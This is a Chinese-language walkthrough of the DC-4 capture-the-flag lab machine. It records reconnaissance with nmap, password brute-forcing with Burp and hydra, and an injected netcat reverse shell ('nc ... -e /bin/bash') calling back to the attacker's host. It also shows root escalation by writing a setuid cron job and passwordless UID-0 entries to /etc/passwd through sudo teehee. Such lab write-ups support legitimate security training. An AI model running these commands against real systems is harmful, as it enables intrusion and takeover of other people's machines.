靶场DC-4和前面DC-1和2相同的网络配置 只有DC-3比较特别 需要重新调配相应的环境
arp-scan -l
nmap -T4 -A 192.168.206.130 -p 1-65535
http://192.168.206.130
可以借助工具burpsuite进行暴力破解
由于非常智障 这里不多赘述
结果 用户名 admin 密码happy
nc+192.168.206.128+9999+-e+/bin/bash
nc -lvp 9999
python美化一下命令框
python -c 'import pty;pty.spawn("/bin/bash")'
接下来可以进行ssh密码穷举攻击 -t后面是线程数
hydra -l jim -P /home/kali/password.txt -t 5 ssh://192.168.206.130
ssh jim@192.168.206.130
#jibril04
看到了You have mail
接下来可以查看邮箱
Charles
^xHhA&hvim0y
直接执行如下的命令是没有权限的
echo root chmod 4777 /bin/sh > /etc/crontab
所以需要使用sudo teehee是可以写文件的 写到计划任务里 定时提权
sudo teehee /etc/crontab
* * * * * root chmod 4777 /bin/sh
ctrl+c
执行以后接下来都可读可写可执行了
DC4靶场新思路和想法:
kali的ip地址是:192.168.206.128
目标靶机是:192.168.206.130
突破点1:通过工具hydra进行爆破
登录界面进行爆破admin的密码 这个时候除了可以使用burpsuite以外 也可以考虑使用hydra
kali字典的默认位置在 /usr/share/wordlists/ 可以选择一些字典
hydra -m "/login.php:username=^USER^&&password=^PASS^:S=lougout" -l admin -P /usr/share/wordlists/rockyou.txt 192.168.206.130 http-form-post
突破点2:写入root用户到passwd从而提权
在ssh登录成功以后 我们sudo -l可以查看到teehee下免密码可以执行root权限 并且teehee可以把字段附加到文本末尾
先介绍下/etc/passwd中不同字段的含义
注册名:口令:用户标识号:组标识号:用户名:用户主目录:命令解释程序
我们尝试写入具有root权限的用户到/etc/passwd来进行提权 之后可以passwd修改密码 也就拿到了靶机的root账户了 也就可以登录了
echo "he::0:0::/home/jim:/bin/bash" |sudo teehee -a "/etc/passwd"
echo "test::0:0::/root:/bin/bash" |sudo teehee -a "/etc/passwd"
